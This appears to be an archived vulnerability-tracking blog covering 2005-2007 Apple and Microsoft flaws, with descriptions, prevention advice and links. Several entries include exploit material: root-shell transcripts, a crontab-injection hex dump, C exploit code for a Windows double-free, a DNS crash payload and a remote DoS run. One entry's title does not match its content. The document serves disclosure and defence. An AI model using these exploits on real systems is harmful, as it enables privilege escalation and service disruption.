Friday, 9 February 2007

Word Unspecified Exploit [4]

Vendor:: Microsoft
Application:: Word XP
Word 2000
Disclosed:: 09-02-07
Description::
This is reported by McAfee as a different vulnerability than all previous Word zero-day vulnerabilities. Microsoft has acknowledged that this vulnerability does cause a denial of service for Word, and claims that exploitability is not possible. However, without any technical details released, exploitability should not be 100% ruled out.

UPDATE (2/14/2007):
The referenced vendor advisory (933052) alludes that this vulnerability affects Word 2000 as well as XP. Also, the vulnerability is not limited to a denial of service, but may also allow for code execution.
Exploit:: Currently searching for public exploit.
Links::
McAfee Blog Post - Exploit Targeting Unpatched Word Vulnerability Spotted
Microsoft Security Advisory (933052)
CVE-2007-0870

Sunday, 28 January 2007

Apple crashdump Privilege Escalation Vulnerability

Vendor:: Apple
Application:: Mac OS X
Disclosed:: 28-01-07
Description:: Crashreporterd is the daemon responsible for detecting application crashes. Crashreporterd listens for mach exceptions and when it detects a mach exception launches crashdump to investigate the crash and report it to the user. Crashdump is a helper tool used by the crashreporterd daemon to create crash reports and notify the user of application crashes.
crashdump will try to write reports at the user home directory first
(/Users/[user]/Library/Logs/CrashReporter/), and if it's not available (ex. permissions don't allow it), it will try the system-wide log directory instead (ex. /Library/Logs/CrashReporter/).
The problem is that it will follow symlinks, and users in the admin group have write access to the directory. As crashreporterd runs under root privileges, any file can be modified by planting a symlink in the /Library/Logs/CrashReporter/ directory, named like the application that will cause the crash dump. We can influence the output by tampering with the Mach-O format. The provided proof of concept demonstrates this by using crafted library names within the binary that triggers the issue.
Exploitation of this issue allows admin-group users (contrary to MOAB-22-01-2007 which allows any user) to gain root privileges without interaction of any type.
Exploit:: The exploit will use a Mach-o binary with a crontab string injected in it's __LINKEDIT segment, for triggering the issue and demonstrating how we can execute arbitrary code under root privileges via crashdump.
The data we are modifying within the Mach-O binary is the __LINKEDIT segment, described in the Mac OS X ABI Mach-O File Format Reference as follows::
The __LINKEDIT segment contains raw data used by the dynamic linker, such as symbol, string, and relocation table entries.
In the sample binary file (starting at offset 0x320)::
38 00 00 00 5F 5F 4C 49 4E 4B 45 44 49 54 00 00 \00 00 00 00 00 40 00 00 00 10 00 00 00 30 00 00 20 04 00 00 03 00 00 00 01 00 00 00 00 00 00 00 ---> __LINKEDIT04 00 00 00 0E 00 00 00 1C 00 00 00 0C 00 00 00 2F 75 73 72 2F 6C 69 62 2F 64 79 6C 64 00 00 00 /0C 00 00 00 34 00 00 00 18 00 00 00 68 B7 9B 4504 03 58 00 00 00 01 00 0A 0A 2A 20 2A 20 2A 20 \2A 20 2A 20 2F 55 73 65 72 73 2F 53 68 61 72 65 ---> injected crontab 64 2F 72 30 30 74 0A 00 18 00 00 00 00 30 00 00 /
MORE...
Links::
MOAB-28-01-2007.rb
vuln (Modified Mach-o binary)

Saturday, 27 January 2007

Telestream Flip4Mac WMV Parsing Memory Corruption Vulnerability

Vendor:: Apple
Application:: Mac OS X - Windows
  • QuickTime™ Player 7.1.3
  • Windows Media ® Components for Quicktime 2.1.0.33
Disclosed:: 27-01-07
Description:: Flip4Mac fails to properly handle WMV files with a crafted ASF_File_Properties_Object size field, leading to an exploitable memory corruption condition, which can be abused remotely for arbitrary code execution.
Exploit:: Flip4Mac™ WMV is a collection of QuickTime components that allow you to play, import, and export Windows Media video and audio files on your Mac using your favorite QuickTime-based applications.
WMV files use the Advanced Systems Format (ASF) container format, originally supported for Macintosh systems via Microsoft's "Windows Media Player for Mac". Since Microsoft decided to stop development of it's Mac-port of WM Player, Flip4Mac became the 'endorsed', somehow official solution.
It fails to properly handle WMV files with a crafted ASF_File_Properties_Object size field, leading to an exploitable memory corruption condition, which can be abused remotely for arbitrary code execution.
ASF_File_Properties_Object:
8CABDCA1-A947-11CF-8EE4-00C00C205365 71494647607722088 112 --| GUID
0x70: A1 DC AB 8C 47 A9 CF 11 8E E4 00 C0 0C 20 53 65 ----/
0x80: 68 00 00 FF 00 00 00 00 63 79 0C 20 28 50 D5 11 [size at 0x80]
Given that we can overwrite saved eip (and thus subvert the execution flow) and provide any payload of our choice by appending it to the WMV file, exploitation for arbitrary code execution is clearly possible. Although, the conditions for PowerPC and x86 are slightly different, and thus the same file won't work for both architectures (this has nothing to do with payload limitations, as we can use one that will work for both ppc and x86, like nemo's multi-arch shellcode).
A working exploit for this issue might be developed later today and released as soon as it's been tested and known to be reliable.
The sample proof of concept provided shows saved eip being overwritten with a bogus address (it's known to not work on PowerPC, as the conditions are slightly different).
MORE...
Prevention::Disable Flip4Mac and/or automated opening of WMV files, and wait for a patch to be released by the vendor (Telestream).
Links::
PoC:: MOAB-27-01-2007.wmv
MOAB-27-01-2007

Thursday, 25 January 2007

Apple CFNetwork HTTP Response Denial of Service

Vendor:: Apple
Application:: Mac OS X
Disclosed:: 25-01-07
Description:: CFNetwork fails to handle certain HTTP responses properly, causing the _CFNetConnectionWillEnqueueRequests() function to dereference a NULL pointer, leading to a denial of service condition exploitable by a server sending a crafted response to a client application making use of this API.
Exploit:: The provided proof of concept will listen at the specified port for incoming connections and send back the response necessary to reproduce the denial of service condition on any default CFNetwork-based client.
$ gcc MOAB-25-01-2007.c -o cfnet-http -framework Carbon
$ ruby MOAB-25-01-2007.rb 8080
++ Starting HTTP server at port 8080.
(once ./cfnet-http runs or CFNetwork client connects...)
++ Connected: CFNetwork/129.19
le...).
Prevention:: Perform sanity checking of HTTP responses received via CFNetwork API.Wait for Apple to add further checks and fix the _CFNetConnectionWillEnqueueRequests() API.
Links::
MOAB-25-01-2007
PoC:: MOAB-25-01-2007.rb and MOAB-25-01-2007.c

Tuesday, 23 January 2007

Apple QuickDraw GetSrcBits32ARGB() Memory Corruption Vulnerability

Vendor:: Apple
Application:: Mac OS X
Disclosed:: 23-01-07
Description:: QuickDraw is integrated in Mac OS X since very early versions, used by Quicktime and any other application that needs to handle PICT images. A vulnerability exists in the handling of ARGB records (Alpha RGB) within PICT images, that leads to an exploitable memory corruption condition (ex. denial of service, so-called crash, which can be used to gain root privileges in combination with MOAB-22-01-2007).
Exploit:: A specially crafted PICT image with a malformed ARGB record can abuse this issue for subverting the pointer passed to the _GetSrcBits32ARGB() function. Up to 3 bytes can be controlled, as the last one is a fixed value (0x70, incremental) and isn't influenced by the image data structure::
at offset 662:

06 ED BB ED AD ED DE
[length] [-] [R] [-] [G] [-] [B]

ADED -> 0xdead
BB+0x03 -> 0xbe
plus fixed value: 0x70

result: 0xdeadbe70

This is enough for pointing at an absolutely different address
(ex. at heap or stack space,user controlled). A valid address will most probably
cause the application to continue execution, although an invalid one will lead to
a memory access violation (KERN_INVALID_ADDRESS exception).

06 ED BB ED AD ED BF
[length] [-] [R] [-] [G] [-] [B]
result: 0xbfadbe70


(gdb) break *0x91782c44
Breakpoint 1 at 0x91782c44
(gdb) r
The program being debugged has been started already.
Start it from the beginning? (y or n) y
(...)
Reading symbols for shared libraries . done

Breakpoint 1, 0x91782c44 in _GetSrcBits32ARGB ()
(gdb) x/4x $eax
0xbfadbe70: 0x00000000 0x00000000 0x00000000 0x00000000

Once execution continues, the address is repeatedly incremented:

Breakpoint 1, 0x91782c44 in _GetSrcBits32ARGB () (gdb) p (void *)$eax $2 = (void *) 0xbfadbe90 (gdb) c Breakpoint 1, 0x91782c44 in _GetSrcBits32ARGB () (gdb) p (void *)$eax $3 = (void *) 0xbfadbe94 (gdb) c Breakpoint 1, 0x91782c44 in _GetSrcBits32ARGB () (gdb) p (void *)$eax $4 = (void *) 0xbfadbe98 (gdb) c Breakpoint 1, 0x91782c44 in _GetSrcBits32ARGB () (gdb) p (void *)$eax $5 = (void *) 0xbfadbe9c (...)
While arbitrary code execution might be possible, until further research is done, it can't be stated as currently viable condition.
Links::
MOAB-23-01-2007
PoC:: MOAB-23-01-2007.pct

Monday, 22 January 2007

Apple UserNotificationCenter Privilege Escalation Vulnerability

Vendor:: Apple
Application:: Mac OS X
Disclosed:: 22-01-07
Description:: UserNotificationCenter retains wheel privileges on execution time, and still has a UID associated with the current user. Because of this, it> will attempt to run any InputManager provided by the user. Code within the input manager will run under wheel privileges. In combination with diskutil and a wheel-writable setuid binary, this allows unprivileged users to gain root privileges.
Exploit::
$ ruby bug-files/MOAB-22-01-2007.rb 0
++ Welcome to Pwndertino...
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 4513 100 4513 0 0 4165 0 0:00:01 0:00:01 --:--:-- 12642
r00tim/
r00tim/Info
r00tim/r00tim.bundle/
r00tim/r00tim.bundle/Contents/
r00tim/r00tim.bundle/Contents/Info.plist
r00tim/r00tim.bundle/Contents/MacOS/
r00tim/r00tim.bundle/Contents/MacOS/r00tim
r00tim/r00tim.bundle/Contents/Resources/
r00tim/r00tim.bundle/Contents/Resources/English.lproj/
r00tim/r00tim.bundle/Contents/Resources/English.lproj/InfoPlist.strings
$ /Applications/System\ Preferences.app/Contents/Resources/installAssistant
sh-2.05b# id
uid=0(root) gid=0(wheel) groups=0(wheel), 81(appserveradm), 79(appserverusr), 80(admin)
A CFUserNotification object presents a simple dialog on the screen and optionally receives feedback from the user. The contents of the dialog can include a header, a message, an icon, text fields, a pop-up button, radio buttons or checkboxes, and up to three ordinary buttons. Use CFUserNotification in processes that do not otherwise have user interfaces, but may need occasional interaction with the user.
The API involved in the handling of these dialogs, CFUserNotificationSendRequest(), works by sending a Mach message to a port named "com.apple.UNCUserNotification".
---- UserNotification-17.1/Libunc/UNCUserNotification.c
#define NOTIFICATION_PORT_NAME "com.apple.UNCUserNotification"
#define NOTIFICATION_PORT_NAME_OLD "UNCUserNotification"
---- UserNotification-17.1/Libunc/UNCUserNotification.c
Basically, this vulnerability makes every "denial of service issue" leading to a so-called 'crash' usable for escalating privileges. Elevating to root from wheel is as simple as replacing the installAssistant binary with a setuid(0) shell wrapper and running diskutil to "repair" the permissions, setting the setuid bit back. diskutil requires the user to have admin group privileges, but due to the fact that it's being executed in the context of the InputManager (which, again, runs with wheel privileges) the issue can be successfully exploited by fully unprivileged users.
Actually, /System/Library/CoreServices/loginwindow.app/Contents/MacOS/loginwindow is responsible
for operating the com.apple.UNCUserNotification port. For example, making a call to CFUserNotificationDisplayAlert() will lead to a call of CFUserNotificationSendRequest() which then interacts with the Mach port. Upon connection, UserNotificationCenter.app application is launched to handle the notification requests. In essence, the notification center application is launched on demand, at any time by any process.
Although, the application retains wheel privileges on execution time, and still has a UID associated with the current user. Because of this, UserNotificationCenter.app will attempt to run any InputManager that the user has placed into ~/Library/InputManagers. The code that is run within the input manager will do so under wheel privileges. In combination with diskutil and a wheel-writable setuid binary, this allows unprivileged users to gain root privileges.
MORE...
Prevention:: Limit user access to ~/Library/InputManagers/. Prevent use of diskutil (modification of permissions of the installAssistant binary isn't enough as the tool will set the permissions back).
Links::
PoC:: MOAB-22-01-2007.rb
MOAB-22-01-2007

Sunday, 21 January 2007

Apple System Preferences writeconfig Local Privilege Escalation Vulnerability

Vendor:: Apple
Application:: Mac OS X
Disclosed:: 21-01-07
Description:: The preference panes setuid helper, writeconfig, makes use of a shell script which lacks of PATH sanitization, allowing users to execute arbitrary binaries under root privileges.
Apple provides the following description in the The Preference Application documentation::
System Preferences is the standard location for presenting system-level preferences on OSX. The preference panes shipped with Mac OS X include panes affecting hardware (such as the Sound, Mouse, and Display panes), software integrated into the system (such as the Dock and Screen Saver panes), and behavior applicable to every application (such as the International and General panes). When application preferences apply to the system or to the user's environment as a whole, a developer can make the preference pane available to System Preferences.
Several of the default preference panes rely on a setuid helper, writeconfig.
Exploit:: The provided (simplistic) exploit will create a root setuid shell wrapper at /tmp/shX. It relies on minimal interaction by the user, read the 'Exploitation conditions' section as this is just one of the possible methods to abuse the issue.
$ ruby MOAB-21-01-2007.rb
++ Click on Sharing and then click on Windows Sharing...
sh-2.05b# id
uid=501(lmh) gid=501(lmh) euid=0(root) groups=501(lmh), 81(appserveradm),
79(appserverusr), 80(admin)
sh-2.05b# ls -al /private/tmp/
total 72
(...)
-rwxr-xr-x 1 lmh wheel 13344 Jan 21 19:29 launchctl
-rwsr-xr-x 1 root wheel 13344 Jan 21 19:29 shX
-rw-r--r-- 1 lmh wheel 78 Jan 21 19:29 t.c
sh-2.05b# exit
exit
More...
Prevention::
Modify /sbin/service::
$ head /sbin/service
#!/bin/sh

set -e
export PATH="/bin:/sbin:/usr/sbin:/usr/bin"

# don't let people kill us. We shouldn't be long, so this isn't a big deal.

trap "" TSTP
trap "" HUP

trap "" INT
Links::
MOAB-21-01-2007
Exploit:: MOAB-21-01-2007.rb

Wednesday, 17 January 2007

Apple SLP Daemon Service Registration Buffer Overflow Vulnerability

Vendor:: Apple
Application:: Mac OS X
Disclosed:: 17-01-07
Description:: slpd is vulnerable to a buffer overflow condition when processing the attr-list field of a registration request, leading to an exploitable denial of service condition and potential arbitrary execution. It would allow unprivileged local (and possibly remote) users to execute arbitrary code under root privileges.
Apple introduced three new APIs that use Bonjour for service discovery. The new APIs are CFNetServices, NSNetServices and DNSServiceDiscovery. In general If your application is targeted to run on Mac OS X 10.2 and later, Apple highly recommends that you use the Bonjour APIs directly for your service discovery needs, instead of NSL.
/usr/sbin/slpd is the path to the Apple Minimal SLP v2 Service Agent, according to the RFC this type of agent is "A process working on the behalf of one or more services to advertise the services". The man page provides the following description::
The SLP daemon (Service Location Protocol) advertises local services to the network. It supports registrations from the slp_reg tool as well as NSL (Network Service Location) and the Directory Services SLP plugin.
slpd is vulnerable to a buffer overflow condition when processing the attr-list field of a registration request, leading to an exploitable denial of service condition and potential arbitrary execution. It would allow unprivileged local (and possibly remote) users to execute arbitrary code under root privileges.
Remote exploitation seems possible, although it's still being verified.
Exploit:: The provided proof of concept uses the local socket opened by slpd for sending the payload. Check the source code for more information.
$ ruby MOAB-17-01-2007.rb

Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_INVALID_ADDRESS at address: 0x8edd9eb1
[Switching to process 22158 thread 0x1e03]
0xffff0ac4 in ___memcpy ()
228 in /System/Library/Frameworks/System.framework/PrivateHeaders/i386/cpu_capabilities.h

(gdb) i r
eax 0xffff07a0 -63584
ecx 0xdeadbeed -559038739
edx 0x2 2
ebx 0xffffffff -1
esp 0xb02fdd70 0xb02fdd70
ebp 0xb02fdd78 0xb02fdd78
esi 0x8edd9eb1 -1898078543
edi 0x8ede19a2 -1898047070
eip 0xffff0ac4 0xffff0ac4 <___memcpy+804>
(...)

(gdb) x/12x $esp
0xb02fdd70: 0xb0305ab4 0x00000000 0xb0305ee8 0x0000b9a7
0xb02fdd80: 0xb0305ab3 0xb02fdfc3 0xdeadbeef 0xb0305ec4
0xb02fdd90: 0xb0305ebc 0xb0305eb8 0xb0305ecc 0xb0305ec8

(gdb) x/8x $ebp
0xb02fdd78: 0xb0305ee8 0x0000b9a7 0xb0305ab3 0xb02fdfc3
0xb02fdd88: 0xdeadbeef 0xb0305ec4 0xb0305ebc 0xb0305eb8


(gdb) break *0x0000b9a2
(gdb) r
(...)
(gdb) info breakpoints
Num Type Disp Enb Address What
3 breakpoint keep y 0x0000b9a2
(gdb) x/1x 0xb02fddc5+506
0xb02fdfbf: 0xdeadbeef
(gdb) x/1x 0xb02fddc5
0xb02fddc5: 0x58585858

(gdb) x/6 0xb991
0xb991: mov -32(%ebp),%eax
0xb994: mov %eax,8(%esp)
0xb998: mov -28(%ebp),%eax
0xb99b: mov %eax,4(%esp)
0xb99f: mov %ecx,(%esp)
0xb9a2: call 0x220dc

(gdb) x/1x $ebp-32
0xb0305ec8: 0xdeadbeef
(gdb) x/1x $esp+8
0xb02fdd88: 0xdeadbeef
(gdb) x/1x $ebp-28
0xb0305ecc: 0xb02fdfc3
(gdb) x/1x $esp+4
0xb02fdd84: 0xb02fdfc3
(gdb) x/1x $esp

0xb02fdd80: 0xb0305ab3
Prevention:: Wait for Apple to release a patch. Disable Personal file sharing and ensure slpd isn't running. This issue was reported to Apple on 8/2/06 5:31 PM.
Links::
MOAB-17-01-2007.rb
MOAB-17-01-2007

Friday, 15 December 2006

NtRaiseHardError

Vendor:: Microsoft
Application:: Windows
  • Windows 2000
    Windows XP
    Windows 2003
    Windows Vista
Disclosed:: 15-12-06
Description::
A double-free vulnerability exists in WINSRV.DLL's handling of certain hard error messages that may be locally exploitable for the purpose of privilege escalation to SYSTEM.
Calling one of the MessageBox APIs with the MB_SERVICE_NOTIFICATION flag set invokes USER32.DLL!ServiceMessageBox, which communicates the message to the CSRSS.EXE process via the NtRaiseHardError native API with status 0x50000018. The message is passed to WINSRV.DLL!UserHardError, which calls UserHardErrorEx, which uses GetHardErrorText to fill out a "hard error information" structure describing the error.
GetHardErrorText first loops through the Unicode strings supplied with the error message, reading each from the originating process's memory and temporarily converting each to an ANSI string. If the ANSI string contains "\Device" or begins with "\??\", or if the error being handled is neither STATUS_VDM_HARD_ERROR (0xC000021D) nor STATUS_SERVICE_NOTIFICATION (0x40000018), the string parameter is replaced with its ANSI form and is marked for eventual deletion when GetHardErrorText does clean-up prior to returning.
Following this loop are three blocks of code responsible for handling STATUS_SERVICE_NOTIFICATION, STATUS_VDM_HARD_ERROR, and other non-matching errors. The first two blocks both improperly assume that their string parameters are in Unicode form and are not marked for deletion, and as a result, they prepare the strings for return to UserHardErrorEx by storing them in UNICODE_STRING local variables using RtlInitUnicodeString. After function clean-up, these UNICODE_STRING variables are copied into the hard error information structure that UserHardErrorEx will subsequently use to display the error. However, during clean-up, any string parameter that was converted and left in ANSI form is freed, meaning that the string pointers stored by the STATUS_SERVICE_NOTIFICATION or STATUS_VDM_HARD_ERROR handling code may be freed and yet still returned.
Some time later, after the message box has been displayed and closed, the string memory will be freed (again) via a call to RtlFreeUnicodeString in the function FreePhi. Successful exploitation of this vulnerability depends on controlling the contents of this memory and the surrounding heap at the time this second free occurs.
Exploit:: Vista
HANDLE e1,e11;
DWORD WINAPI tp1(LPVOID a){
LPVOID p[7];
DWORD d;
p[0]=p+3;
p[1]=p+5;
p[2]=0;
p[3]=(LPVOID)0x1B001AE;
p[4]=L"\\??\\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
L"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
L"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
L"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
p[5]=(LPVOID)0x100010;
p[6]=L"erasmus1";
while(1){
WaitForSingleObject(e1,INFINITE);
NtRaiseHardError(0x40000018,3,3,p,0,&d);
SetEvent(e11);
}
return 0;
Prevention:: Arbitrary code execution as SYSTEM
This does allow for the attacker to elevate his/her privileges to SYSTEM, allowing for complete system compromise no matter what credentials were used launch this vulnerability.
Links::
Public PoC Code Disclosure (Denial of Service)[XP]
First Public PoC Code Disclosure - Russian (Denial of Service)[XP]
MSRC Blog Post
Public PoC Code Disclosure (Double-Free)[XP]
Public PoC Code Disclosure - Vista (Local SYSTEM Command Shell)[VISTA]

Monday, 27 November 2006

Mac OS X AppleTalk AIOCREGLOCALZN Ioctl Memory Corruption

Vendor:: Mac
Application:: OS X
Disclosed:: 27-11-06
Description:: Mac OS X AppleTalk protocol handling code is vulnerable to an exploitable memory corruption issue. This particular vulnerability is caused by failure to validate input data in the AIOCREGLOCALZN ioctl command, and can be abused by unprivileged users by opening an AppleTalk socket and issuing the ioctl control command with a crafted data structure.
Author:: LMH - discovery, MoKB release, debugging.
Exploit:: The following proof of concept / exploit can be used to reproduce the bug (requires Xcode/GNU GCC compiler to be installed): MOKB-27-11-2006.c (x86)
gcc MOKB-27-11-2006.c -o  MOKB-27-11-2006 && ./MOKB-27-11-2006
It's been tested on an up-to-date (27-11-2006) Mac OS X installation, running on an
Intel "shipping" Mac (x86).

alkali:/tmp lmh$ $ gdb /Volumes/KernelDebugKit/mach_kernel -c core-xnu-792.13.8-172.16.0.10-a16a4845
GNU gdb 6.3.50-20050815 (Apple version gdb-573) (Fri Oct 20 15:50:43 GMT 2006)
[...]

This GDB was configured as "i386-apple-darwin"...
#0 Debugger (message=0x3c9540 "panic") at /SourceCache/xnu/xnu-792.13.8/osfmk/i386/AT386/model_dep.c:770
Line number 770 out of range; /SourceCache/xnu/xnu-792.13.8/osfmk/i386/AT386/model_dep.c has 312 lines.
(gdb) source /Volumes/KernelDebugKit/kgmacros
Loading Kernel GDB Macros package. Type "help kgm" for more info.

(gdb) paniclog
panic(cpu 1 caller 0x001A3135): Unresolved kernel trap (CPU 1, Type 14=page fault), registers:
CR0: 0x80010033, CR2: 0x00000000, CR3: 0x00d72000, CR4: 0x000006e0
EAX: 0x00000000, EBX: 0x00000000, ECX: 0x000000f4, EDX: 0x000000f5
CR2: 0x00000000, EBP: 0x00000000, ESI: 0x00000000, EDI: 0x00000000
EFL: 0x00010206, EIP: 0x00000000, CS: 0x00000004, DS: 0x0000000c

MORE...
Links::
Mac OS X XNU source code for AppleTalk

Sunday, 26 November 2006

Mac OS X Universal Binary Loading Memory Corruption

Vendor:: Mac
Application:: OS X
Disclosed:: 26-11-06
Description:: Mac OS X fails to properly handle corrupted Universal Binaries, leading to an exploitable memory corruption condition with potential risk of kernel-mode arbitrary code execution. This particular vulnerability is caused by an integer overflow in the fatfile_getarch2() function. Local unprivileged users can abuse this issue with specially crafted Mach-O 'Universal' binaries.
Author:: LMH - discovery, MoKB release, debugging.
Exploit:: The following Mach-O 'Universal' binary can be used to reproduce the bug: MOKB-26-11-2006.bz2
bunzip2 MOKB-26-11-2006.bz2 && ./MOKB-26-11-2006

yssupstae:/tmp evets$ gdb /Volumes/KernelDebugKit/mach_kernel -c core-xnu-792.13.8-172.16.0.10-79aa141d
GNU gdb 6.3.50-20050815 (Apple version gdb-573) (Fri Oct 20 15:50:43 GMT 2006)

[...]
This GDB was configured as "i386-apple-darwin"...
#0 Debugger (message=0x3c9540 "panic") at /SourceCache/xnu/xnu-792.13.8/osfmk/i386/AT386/model_dep.c:770
Line number 770 out of range; /SourceCache/xnu/xnu-792.13.8/osfmk/i386/AT386/model_dep.c has 312 lines.
(gdb) source /Volumes/KernelDebugKit/kgmacros
Loading Kernel GDB Macros package. Type "help kgm" for more info.
(gdb) paniclog
panic(cpu 0 caller 0x001A3135): Unresolved kernel trap (CPU 0, Type 14=page fault), registers:
CR0: 0x80010033, CR2: 0x2524200c, CR3: 0x00d72000, CR4: 0x000006e0
EAX: 0x00000000, EBX: 0x3fffff35, ECX: 0x40000002, EDX: 0x00000000
CR2: 0x2524200c, EBP: 0x13fcb8a8, ESI: 0x2524200c, EDI: 0x00ffffff
EFL: 0x00010206, EIP: 0x00369de4, CS: 0x00000004, DS: 0x02ec000c

MORE...

Links::
Mac OS X ABI Mach-O File Format Reference

Monday, 6 November 2006

Windows kernel GDI local privilege escalation

Vendor:: Microsoft
Application:: Windows
Disclosed:: 06-11-06
Description:: A vulnerability in the handling of GDI kernel structures of Microsoft Windows leads to an exploitable memory corruption condition, causing a denial of service (so-called BSoD) or arbitrary code execution on successful exploitation. This would allow a local user to escalate privileges, gaining full control of the system.
Author:: Cesar Cerrudo - Contributed proof of concept and information, found vulnerability.
LMH - MoKB release, testing, debugging information.
Exploit:: Cesar's explanation:
Microsoft Windows GDI Kernel data structures are mapped on a global shared memory section that is created automatically on any windows process that uses GDI objects (process with a GUI, etc.), this section is mapped as read-only, but any process can re-map it as read-write (by default this kernel shared section has read, write, execute permissions), thus processes can write to this section overwriting the GDI kernel data structures, causing a denial of service (BSoD)/ crashing Windows. If certain selected data structures are overwritten with specific data it is possible to perform arbitrary code excecution. Affected versions:
  • Microsoft Windows 2000
  • Microsoft Windows 2000 Service Pack 1
  • Microsoft Windows 2000 Service Pack 2
  • Microsoft Windows 2000 Service Pack 3
  • Microsoft Windows 2000 Service Pack 4
  • Microsoft Windows XP
  • Microsoft Windows XP Service Pack 1
  • Microsoft Windows XP Service Pack 2

Not affected:

  • Microsoft Windows Server 2003
  • Microsoft Windows Vista (tested with beta 2)
Related debugging information::
typedef struct
{
DWORD pKernelInfo;
WORD ProcessID;
WORD _nCount;
WORD nUpper;
WORD nType;
DWORD pUserInfo;
} GDITableEntry;

Microsoft (R) Windows Debugger Version 6.4.0007.2
Copyright (c) Microsoft Corporation. All rights reserved.

Opened \\.\pipe\com_1
Waiting to reconnect...
Connected to Windows 2000 2195 x86 compatible target, ptr64 FALSE
Kernel Debugger connection established. (Initial Breakpoint requested)
Symbol search path is: C:\WINDOWS\Symbols
Executable search path is:
Windows 2000 Kernel Version 2195 UP Free x86 compatible
Kernel base = 0x80400000 PsLoadedModuleList = 0x80481580
System Uptime: not available
Break instruction exception - code 80000003 (first chance)
Source Code
Links::
Proof of concept:: GDIKernelPoC.cpp

Saturday, 28 October 2006

Internet Connection Sharing DoS

Vendor:: Microsoft
Application:: Windows
Disclosed:: 28-10-06
Description:: Microsoft Windows NAT Helper Components (ipnathlp.dll) on Windows XP SP2, when Internet Connection Sharing is enabled, allows remote attackers to cause a denial of service (svchost.exe crash) via a malformed DNS query, which results in a null pointer dereference.
Exploit:: Remote Shutdown of Windows Firewall from LAN
Thus vulnerability allows for the remote shutdown of the Windows firewall from the LAN side.
This vulnerability cannot be exploited across the Internet (WAN) side of the network.
Prevention:: Deny service to the Internet Connection Sharing Service by disabling the service, or blocking udp/53 on the host running ICS.
Links::
CVE-2006-5614
First Public PoC Code Disclosure (Denial of Service)

Friday, 27 October 2006

NAT Helper Components [ipnathlp.dll] Remote DOS

Vendor:: Microsoft
Application:: Internet Explorer
Disclosed:: 27-10-06
Description:: The "Execute" method of ADODB.Connection.2.7 and ADODB.Connection.2.8 objects allow malicious script to free heap memory in a way that circumvents the script interpreter's memory manager. The second argument to Execute, a variant, is passed to VariantClear, which will free the associated string memory using SysFreeString if the variant represents a BSTR. The script interpreter has no way of knowing that the string memory was freed, and may try to double-free or re-use the memory after the Execute call returns.
The original proof-of-concept passes references to a single large string as both the second and third arguments of Execute. The string memory is freed when the second argument is passed to VariantClear, causing the memory to be decommitted due to its size, but then the code responsible for processing the third argument attempts to access the now-freed memory and produces the observed crash. By using a smaller string, the decommit will not occur, and double-frees and free memory reuse are therefore possible.
Exploitation is complicated by memory caching and garbage collection behaviors, but arbitrary memory overwrites due to heap corruption have been demonstrated.
Exploit:: Arbitrary code execution under the logged in user
 Exploit(192.168.0.2) --> Microsoft NAT(192.168.0.1) --> [..Internet..]

[Process svchost.exe, module ipnathlp]
--> MOV DL, [EAX]
Exception C0000005 (ACCESS_VIOLATION reading [00000000])
buffer = ( # DNS (query)
"\x6c\xb6" # Transaction ID: 0x6cb6
"\x01\x00" # Flags: 0x0100 (Standard query)
"\x00\x00" # Questions: 0
"\x00\x00" # Answer RRs: 0
"\x00\x00" # Authority RRs: 0
"\x00\x00" # Additional RRs: 0 <-- Bug is here (0, 0, 0, 0) "\x03\x77\x77\x77" # "\x06\x67\x6f\x6f" # "\x67\x6c\x65\x03" # "\x63\x6f\x6d\x00" # Name: www.google.com "\x00\x01" # Type: A (Host address) "\x00\x01" # Class: IN (0x0001) )

An ActiveX remote code execution vulnerability has a very high impact since the source of the malicious payload can be any site on the Internet. An even more critical problem is generated when clients are administrators on their local hosts, which would run the malicious payload with Administrator credentials.
Prevention::The best form is available by kill-bitting the CLSIDs for the ADODB.Connection ActiveX Control (00000514-0000-0010-8000-00AA006D2EA4) following the directions of KB240797. This will disable both ActiveX objects, regardless of version.
Links::
CVE-2006-5559
MSRC Blog Post
First Public PoC Code Disclosure (Denial of Service)

Wednesday, 16 November 2005

RPC Memory Exhaustion

Vendor:: Microsoft
Application:: Windows
Disclosed:: 16-11-05
Description:: Three referenced exploits take advantage of an inherent problem in RPC, in which an attacker gets to supply the size of an output buffer, and RPC allocates the buffer and (more importantly) initializes it to zeroes, which causes the entire memory range to become committed. For huge output buffers, the target service (which is given all the virtual memory it wants, due to its privileges) will cause virtual memory exhaustion, in the worst cases resulting in page file thrashing, a "low virtual memory" message, and general system unresponsiveness.

For the UPNP service, the vulnerable function is PNP_GetDeviceList(), which is available over the RPC endpoint for the UPNP (8D9F4E40-A03D-11CE-8F69-08003E30051B) in opnum 0x0A. The MIDL for the vulnerable opnum is:
long PNP_GetDeviceList (
[in][unique][string] wchar_t * arg_1,
[out][size_is(*arg_3)][length_is(*arg_3)] wchar_t * arg_3, //vulnerable argument
[in, out] long * arg_3, //vulnerable argument
[in] long arg_4
);
Regarding the Print Spooler service, the vulnerable function is GetPrinterData(), which is available over the RPC endpoint for the SPOOLSS (12345678-1234-abcd-ef00-0123456789ab) in opnum 0x1A. The MIDL for the vulnerable opnum is:
long RpcGetPrinterData (
[in][context_handle] void * arg_1,
[in][string] wchar_t * arg_2,
[out] long * arg_3,
[out][size_is(arg_5)] char * arg_4, //vulnerable argument
[in] long arg_5, //vulnerable argument
[out] long * arg_6
);

Exploit:: Denial of Service / Virtual Memory Exhaustion
C:\>python spoolss_dos.py 192.168.0.2 512

[*] MS Windows GetPrinterData() 0day Memory Allocation Remote DoS Exploit
[*] Coded by h07
[*] Connecting to 192.168.0.2:445
[+] Connected
[+] The NETBIOS connection with the remote host timed out.
[+] 192.168.0.2: Out of memory
[+] Done
Exploit --> GetPrinterData(handle, value, 1024 * 1024 * 512) --> MS_Windows
Spooler service(spoolsv.exe) memory usage: 512 MB

This vulnerability does not allow for the execution of code, but can cause virtual memory exhaustion, in the worst cases resulting in page file thrashing, a "low virtual memory" message, and general system unresponsiveness. On Windows 2000 and Windows XP prior to Service Pack 2 (if found to be vulnerable), this is available to anonymous attackers. Within Windows XP Service Pack 2 and Windows Server 2003, this is only available to authenticated users.
